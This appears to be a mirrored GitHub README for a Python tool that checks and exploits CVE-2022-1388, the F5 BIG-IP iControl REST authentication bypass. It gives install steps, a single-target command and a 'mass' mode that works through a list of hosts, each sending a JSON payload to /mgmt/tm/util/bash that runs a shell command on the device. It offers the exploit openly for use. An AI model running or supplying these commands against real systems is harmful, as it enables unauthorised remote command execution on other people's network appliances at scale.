gabriellaabigail / CVE-2022-1388

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

CVE-2022-1388

Checking and exploit for CVE-2022-1388

Installation:

python3 -m pip install -r requirements.txt

Usage

Single :

python3 cve.py s [fullurl] [api_command]

#example
python3 cve.py s http://127.0.0.1:8000/mgmt/tm/util/bash '{"command":"run","utilCmdArgs":"-c id"}'

Mass :

python3 cve.py m [host list] [endpoint] [api_command] [pool]

#example
python3 cve.py m host.txt /mgmt/tm/util/bash '{"command":"run","utilCmdArgs":"-c id"}' 10

References:

About


Languages

Language:Python 100.0%